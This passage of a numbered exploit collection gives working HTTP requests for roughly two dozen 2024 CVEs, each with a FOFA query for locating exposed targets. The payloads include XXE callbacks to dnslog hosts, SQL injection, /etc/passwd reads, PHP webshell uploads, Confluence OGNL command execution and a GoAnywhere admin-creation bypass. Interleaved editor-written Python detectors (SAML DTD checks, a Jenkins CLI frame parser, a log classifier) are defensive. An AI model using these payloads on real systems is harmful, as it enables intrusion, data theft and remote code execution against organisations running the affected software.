<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/2000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>

103. Ivanti Pulse Connect Secure VPN XXE
CVE-2024-22024
FOFA:body="welcome.cgi?p=logo"
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: 192.168.40.130:111
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==


The SAMLRequest value is the base64 of the following XML:
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM "http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>

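Because the SAMLRequest parameter is just base64 of the XML, the check a defender wants in front of saml-sso.cgi is to decode the parameter and refuse anything that carries a DTD at all: a SAML message never legitimately needs one, and the external parameter entity above is what makes the parser call out. The following is an added example (editor's code, not from the original page and not from Ivanti) that does this for both SAML bindings: plain base64 as in the HTTP-POST binding used by the request above, and raw-DEFLATE-then-base64 as in the HTTP-Redirect binding. The page's SAMLRequest value is the sample input; the benign AuthnRequest and the finding labels are constructed for the example.

```python
import base64
import re
import zlib

# SAMLRequest value from the PoC above (HTTP-POST binding: base64 of the XML as-is).
POC_SAMLREQUEST = (
    "PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0K"
    "ICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg=="
)

# Constructed benign AuthnRequest for comparison (not from the page).
BENIGN_XML = ('<?xml version="1.0"?><samlp:AuthnRequest '
              'xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" ID="_1" Version="2.0" '
              'IssueInstant="2024-01-01T00:00:00Z"></samlp:AuthnRequest>')

# A SAML message never needs a DTD; any of these is grounds to drop the request.
_DTD_MARKERS = [
    (re.compile(r"<!DOCTYPE", re.I), "DOCTYPE declaration"),
    (re.compile(r"<!ENTITY\s+%", re.I), "parameter entity"),
    (re.compile(r"<!ENTITY\b", re.I), "general or parameter entity"),
    (re.compile(r"\b(SYSTEM|PUBLIC)\s+[\"']", re.I), "external identifier"),
]


def decode_saml_request(value: str) -> str:
    """Recover the XML behind a SAMLRequest parameter.
    HTTP-POST binding is base64 only; HTTP-Redirect binding is raw DEFLATE then base64,
    so try the plain form first and fall back to inflating (wbits=-15 means raw deflate)."""
    raw = base64.b64decode(value)
    try:
        text = raw.decode("utf-8")
        if text.lstrip().startswith("<"):
            return text
    except UnicodeDecodeError:
        pass
    return zlib.decompress(raw, -15).decode("utf-8")


def xxe_findings(xml_text: str):
    """Labels of the DTD constructs present, in _DTD_MARKERS order; [] means none seen."""
    return [label for pattern, label in _DTD_MARKERS if pattern.search(xml_text)]


def external_references(xml_text: str):
    """URLs named as SYSTEM identifiers, i.e. where the parser would be made to call out."""
    return re.findall(r"SYSTEM\s*[\"']([^\"']+)[\"']", xml_text, re.I)


def redirect_binding_encode(xml_text: str) -> str:
    """Encode as the HTTP-Redirect binding does (raw DEFLATE + base64), to exercise the fallback."""
    comp = zlib.compressobj(9, zlib.DEFLATED, -15)
    return base64.b64encode(comp.compress(xml_text.encode("utf-8")) + comp.flush()).decode("ascii")


if __name__ == "__main__":
    xml = decode_saml_request(POC_SAMLREQUEST)
    print(xml)
    print("findings:", xxe_findings(xml))
    print("calls out to:", external_references(xml))
```

Run against the page's value it reports all four markers and the dnslog URL the entity points at; run against a normal AuthnRequest it reports nothing. The check is deliberately on the raw text rather than on a parsed tree, because the whole point is to reject the document before any XML parser touches it.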
104. Totolink T8 cstecgi.cgi getSysStatusCfg configuration information disclosure
CVE-2024-0569
FOFA:title="TOTOLINK"
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content-Length: 41
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"topicurl":"getSysStatusCfg","token":""}

105. SpringBlade v3.2.0 export-user SQL injection
FOFA:body="https://bladex.vip"
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1

106. SpringBlade dict-biz/list SQL injection
FOFA:body="Saber 将不能正常工作"
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

107. SpringBlade tenant/list SQL injection
FOFA:body="https://bladex.vip"
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: <replace with your own token>
Connection: close

108. D-Tale 3.9.0 SSRF
CVE-2024-21642
FOFA:"dtale/static/images/favicon.png"
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
Host: your-ip
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

109. Jenkins CLI arbitrary file read
CVE-2024-23897
FOFA:header="X-Jenkins"
POST /cli?remoting=false HTTP/1.1
Host:
Content-type: application/octet-stream
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: upload
Connection: keep-alive
Content-Length: 163

b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'


POST /cli?remoting=false HTTP/1.1
Host:
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: download
Content-Type: application/x-www-form-urlencoded
Content-Length: 0


The download side returns the file contents embedded in the help command's error text:
ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help [COMMAND]
Lists all the available commands or a detailed description of single command.
 COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)

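The body of the upload-side request above is not opaque: it is a sequence of frames of the Jenkins plain CLI protocol spoken over POST /cli?remoting=false, each being a 4-byte big-endian payload length that does not count the opcode, a 1-byte opcode, and the payload, where string payloads carry the 2-byte length prefix that Java's DataOutputStream.writeUTF writes. The following is an added example (editor's code, not part of the original page and not Jenkins code) that encodes and decodes such bodies, reproduces the PoC bytes exactly, and lists every argument beginning with @, which is the args4j file-expansion behaviour that CVE-2024-23897 turns into a file read. The opcode numbers ARG=0, LOCALE=1, ENCODING=2, START=3 are read off the PoC body itself.

```python
import struct

# Opcodes as they appear in the PoC body above (client-side ops of the Jenkins plain
# CLI protocol spoken over POST /cli?remoting=false with Side: upload).
OP_ARG, OP_LOCALE, OP_ENCODING, OP_START = 0, 1, 2, 3
OP_NAMES = {OP_ARG: "ARG", OP_LOCALE: "LOCALE", OP_ENCODING: "ENCODING", OP_START: "START"}


def java_utf(text: str) -> bytes:
    """Java DataOutputStream.writeUTF layout: 2-byte big-endian length, then the bytes."""
    data = text.encode("utf-8")
    return struct.pack(">H", len(data)) + data


def frame(op: int, payload: bytes = b"") -> bytes:
    """One frame: 4-byte big-endian payload length (opcode not counted), opcode, payload."""
    return struct.pack(">I", len(payload)) + bytes([op]) + payload


def build_upload_body(args, encoding="GBK", locale="en_US") -> bytes:
    """Encode a CLI invocation in the order the PoC uses: ARG frames, ENCODING, LOCALE, START."""
    body = b"".join(frame(OP_ARG, java_utf(a)) for a in args)
    body += frame(OP_ENCODING, java_utf(encoding))
    body += frame(OP_LOCALE, java_utf(locale))
    body += frame(OP_START)
    return body


def parse_upload_body(body: bytes):
    """Decode a body into (opcode name, text) pairs; raises ValueError on a truncated frame."""
    out, pos = [], 0
    while pos < len(body):
        if len(body) - pos < 5:
            raise ValueError(f"truncated frame header at offset {pos}")
        (plen,) = struct.unpack_from(">I", body, pos)
        op = body[pos + 4]
        payload = body[pos + 5:pos + 5 + plen]
        if len(payload) != plen:
            raise ValueError(f"truncated payload at offset {pos}")
        text = ""
        if plen:
            (slen,) = struct.unpack_from(">H", payload, 0)
            text = payload[2:2 + slen].decode("utf-8")
        out.append((OP_NAMES.get(op, f"OP{op}"), text))
        pos += 5 + plen
    return out


def file_expansion_args(body: bytes):
    """ARG values that args4j would expand as @file: the CVE-2024-23897 read primitive."""
    return [text for name, text in parse_upload_body(body) if name == "ARG" and text.startswith("@")]


# The request body from the PoC above, transcribed as a Python bytes literal.
POC_BODY = (b"\x00\x00\x00\x06\x00\x00\x04help"
            b"\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd"
            b"\x00\x00\x00\x05\x02\x00\x03GBK"
            b"\x00\x00\x00\x07\x01\x00\x05en_US"
            b"\x00\x00\x00\x00\x03")

if __name__ == "__main__":
    for name, text in parse_upload_body(POC_BODY):
        print(f"{name:<8} {text!r}")
    print("file-expansion args:", file_expansion_args(POC_BODY))
    print("body length:", len(POC_BODY))
```

A reverse proxy or WAF in front of Jenkins can run POST bodies for /cli through parse_upload_body and alert on anything file_expansion_args returns; len(POC_BODY) is also the Content-Length a client actually has to send for this body.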
110. GoAnywhere MFT unauthenticated administrator creation
CVE-2024-0204
FOFA:body="InvalidBrowser.xhtml" || icon_hash="1484947000" || icon_hash="1828756398" || icon_hash="1170495932"
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
Host: 192.168.40.130:8000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

111. WordPress plugin HTML5 Video Player SQL injection
CVE-2024-1061
FOFA:"wordpress" && body="html5-video-player"
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
Host: 192.168.40.130:112
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

112. WordPress plugin NotificationX SQL injection
CVE-2024-1698
FOFA:body="/wp-content/plugins/notificationx"
POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}

113. WordPress Automatic plugin arbitrary file download and SSRF
CVE-2024-27954
FOFA:"/wp-content/plugins/wp-automatic"
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

114. WordPress MasterStudy LMS plugin SQL injection
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

115. WordPress Bricks Builder <= 1.9.6 RCE
CVE-2024-25600
FOFA:body="/wp-content/themes/bricks/"
Step 1: fetch the site's nonce value.
GET / HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: gzip


Step 2: substitute the nonce value and execute the command.
POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 356
Content-Type: application/json
Accept-Encoding: gzip

{
  "postId": "1",
  "nonce": "<value obtained in step 1>",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}

116. WordPress js-support-ticket file upload
FOFA:body="wp-content/plugins/js-support-ticket"
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=--------767099171
User-Agent: Mozilla/5.0

----------767099171
Content-Disposition: form-data; name="action"

configuration_saveconfiguration
----------767099171
Content-Disposition: form-data; name="form_request"

jssupportticket
----------767099171
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
Content-Type: image/png

----------767099171--

117. WordPress LayerSlider plugin SQL injection
Version: 7.9.11 – 7.10.0
FOFA:body="/wp-content/plugins/LayerSlider/"
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

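Most of the requests from entry 101 onward leave a recognisable trace in an ordinary web server access log: a dot-dot traversal followed by a shell metacharacter in the last path segment (101), a Tomcat-style ..;/ path parameter that lands on a different servlet than the one the URL names (110), an updatexml() or sleep() call in the query string, sometimes in the parameter name rather than a value (105 to 107, 111, 114, 117), or a file:// URL handed to a download parameter (113). The following is an added example (editor's code, not from the page or any of the vendors) that decodes each request target, normalises the path the way the server will, and tags it with those patterns. The log lines are constructed for the example and reuse the request targets shown above; the rule names are the editor's.

```python
import re
from urllib.parse import unquote, urlsplit

# Combined/common log format: client, method, request target, protocol, status.
_LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) \S+" (?P<status>\d{3})')

# ';' that is not a 'name=value' path parameter, or '|', '`', '$(' followed by something:
# what turns a reachable path into a shell command in the Ivanti request.
_SHELL_META = re.compile(r"(?:;(?![\w.-]+=)|\||`|\$\()\s*\S")
_SQL_FUNCS = re.compile(r"\b(updatexml|extractvalue|sleep|benchmark)\s*\(", re.I)

# Constructed access-log excerpt; the request targets are those of entries 101, 110,
# 106, 111 and 113 above plus two benign lines (a jsessionid path parameter and a plain POST).
SAMPLE_LOG = """\
203.0.113.7 - - [10/Jan/2024:10:00:01 +0000] "GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1" 200 512
203.0.113.8 - - [10/Jan/2024:10:00:02 +0000] "GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1" 200 9031
203.0.113.9 - - [10/Jan/2024:10:00:03 +0000] "GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1" 500 233
203.0.113.10 - - [10/Jan/2024:10:00:04 +0000] "GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1" 200 87
203.0.113.11 - - [10/Jan/2024:10:00:05 +0000] "GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1" 200 1804
198.51.100.5 - - [10/Jan/2024:10:00:06 +0000] "GET /wp-content/themes/bricks/style.css;jsessionid=abc HTTP/1.1" 200 4411
198.51.100.6 - - [10/Jan/2024:10:00:07 +0000] "POST /wp-json/notificationx/v1/analytics HTTP/1.1" 200 54
"""


def fully_decode(target: str, rounds: int = 3) -> str:
    """Percent-decode until stable (bounded), so %253b and %3b both end up as ';'."""
    for _ in range(rounds):
        decoded = unquote(target)
        if decoded == target:
            break
        target = decoded
    return target


def normalize_path(path: str) -> str:
    """Resolve '.' and '..' after dropping ';...' path parameters from each segment,
    which is how /images/..;/wizard/ is served as /wizard/ by a servlet container."""
    out = []
    for seg in path.split("/"):
        seg = seg.split(";", 1)[0]
        if seg in ("", "."):
            continue
        if seg == "..":
            if out:
                out.pop()
            continue
        out.append(seg)
    return "/" + "/".join(out)


def classify(target: str):
    """Names of the rules a request target trips, in a fixed order; [] means nothing seen."""
    parts = urlsplit(fully_decode(target))
    path, query = parts.path, parts.query
    hits = []
    if re.search(r"(^|/)\.\.(;[^/]*)?(/|$)", path):
        hits.append("path-traversal")
    if "..;" in path:
        hits.append("path-parameter-traversal")
    if any(_SHELL_META.search(seg) for seg in path.split("/")):
        hits.append("command-injection")
    if _SQL_FUNCS.search(query):
        hits.append("sql-injection")
    if re.search(r"\bfile:/", query, re.I):
        hits.append("local-file-scheme")
    return hits


def triage(log_text: str):
    """Run classify() over each parsable line and keep only those that tripped a rule."""
    rows = []
    for line in log_text.splitlines():
        m = _LOG_RE.match(line)
        if not m:
            continue
        hits = classify(m["target"])
        if hits:
            decoded_path = urlsplit(fully_decode(m["target"])).path
            rows.append({"ip": m["ip"], "target": m["target"], "hits": hits,
                         "normalized": normalize_path(decoded_path)})
    return rows


if __name__ == "__main__":
    for row in triage(SAMPLE_LOG):
        print(row["ip"], row["hits"], "->", row["normalized"])
```

The normalised path is the useful column for a responder: the Ivanti line resolves to /api/v1/license/keys-status and the GoAnywhere line to /goanywhere/wizard/InitialAccountSetup.xhtml, which are the endpoints actually reached, not the ones the raw URL appears to name. Decoding is repeated so that double-encoded variants (%253b) are not missed, and the ';' rule ignores ordinary ;jsessionid= path parameters.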
118. Beijing Baichuo (百绰) Smart S210 management platform uploadfile.php arbitrary file upload
CVE-2024-0939
FOFA:title="Smart管理平台"
POST /Tool/uploadfile.php? HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
Content-Length: 405
Origin: https://192.168.40.130:8443
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
Content-Type: application/octet-stream

<?php
system($_POST["passwd"]);
?>
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="txt_path"

/home/src.php
-----------------------------13979701222747646634037182887--


Then access /home/src.php.

119. Beijing Baichuo Smart S20 backend sysmanageajax.php SQL injection
CVE-2024-1254
FOFA:title="Smart管理平台"
Log in first; the default credentials are admin/admin.
POST /sysmanage/sysmanageajax.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 109
Origin: https://58.18.133.60:8443
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Forwarded-For: 1.1.1.1
X-Originating-Ip: 1.1.1.1
X-Remote-Ip: 1.1.1.1
X-Remote-Addr: 1.1.1.1
Te: trailers
Connection: close

src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456

120. Beijing Baichuo Smart S40 management platform web.php import arbitrary file upload
CVE-2024-1253
FOFA:title="Smart管理平台"
POST /useratte/web.php? HTTP/1.1
Host: ip:port
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 597
Origin: https://ip:port
Referer: https://ip:port/sysmanage/licence.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="file_upload"; filename="2.php"
Content-Type: application/octet-stream

<?php phpinfo()?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="mode"

import
-----------------------------42328904123665875270630079328--


Uploaded file path: /upload/2.php

121. Beijing Baichuo Smart S42 management platform userattestation.php arbitrary file upload
CVE-2024-1918
FOFA:title="Smart管理平台"
POST /useratte/userattestation.php HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 592
Origin: https://192.168.40.130:8443
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="web_img"; filename="1.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="hidwel"

set
-----------------------------42328904123665875270630079328--


Uploaded file path: boot/web/upload/weblogo/1.php

122. Beijing Baichuo Smart S200 management platform /importexport.php SQL injection
CVE-2024-27718
FOFA:title="Smart管理平台"
Here sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk= is the SQL statement base64-encoded; plaintext: sql=select 1,database(),version()
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close


123. Atlassian Confluence template injection code execution
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))

124. Hunan Jianyan engineering quality inspection system arbitrary file upload
FOFA:body="/Content/Theme/Standard/webSite/login.css"
POST /Scripts/admintool?type=updatefile HTTP/1.1
Host: 192.168.40.130:8282
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 72
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded

filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>

http://192.168.40.130:8282/Scripts/abcgcg.aspx
125. ConnectWise ScreenConnect authentication bypass
CVE-2024-1709
FOFA:icon_hash="-82958153"
https://github.com/watchtowrlabs ... bypass-add-user-poc

Usage
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!

After the user is created, log in to the admin backend directly; system commands can be executed.

126. Aiohttp path traversal
FOFA:title=="ComfyUI"
GET /static/../../../../../etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
